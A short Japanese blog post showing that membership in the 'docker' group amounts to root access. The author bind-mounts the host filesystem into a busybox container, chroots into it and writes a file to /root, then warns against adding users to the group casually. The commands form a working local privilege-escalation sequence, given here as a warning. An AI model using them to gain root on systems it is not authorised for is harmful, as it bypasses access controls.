Arch LinuxのWikiに気になる記述が。
https://wiki.archlinuxjp.org/index.php/Docker
警告: ユーザーを 'docker' グループに追加することは root にするのと同義です。詳しくは [2] や [3] を参照。
ということで、調べてみた。
大体はここに載っているとおり。
https://www.andreas-jung.com/contents/on-docker-security-docker-group-considered-harmful
volume使うとなんでもありです。試しに、シェルから/rootにファイルを作ってみました。
[penguin@arch ~]$ docker run -it -v /:/mnt busybox sh
/ # chroot mnt && su -
[root@8128f6a7dad3 /]# cd
[root@8128f6a7dad3 ~]# echo you are hacked > /root/hello_docker
さてはて。ホストOSでは。
[penguin@arch ~]$ sudo cat /root/hello_docker
you are hacked
というわけなので、無闇矢鱈にユーザをdockerグループに加えないよう、注意しましょう。